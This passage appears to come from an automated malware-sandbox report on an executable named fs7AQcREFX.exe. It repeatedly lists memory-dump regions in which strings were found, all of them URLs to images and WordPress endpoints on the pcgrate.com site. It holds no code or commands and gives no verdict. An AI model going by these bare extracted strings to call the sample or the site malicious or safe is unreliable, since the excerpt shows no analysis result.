00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Huawei-Logowine-1.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/IIG_logo-5.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Newport-logo-76F09AD2F3-seeklogo.com_-e1626287837846.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-150x150.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-200x200.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-300x298.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/bae_systems-1.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/horiba_1.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/logo_01-1.png
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.518757229.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F&#038;format=xm
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.518757229.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
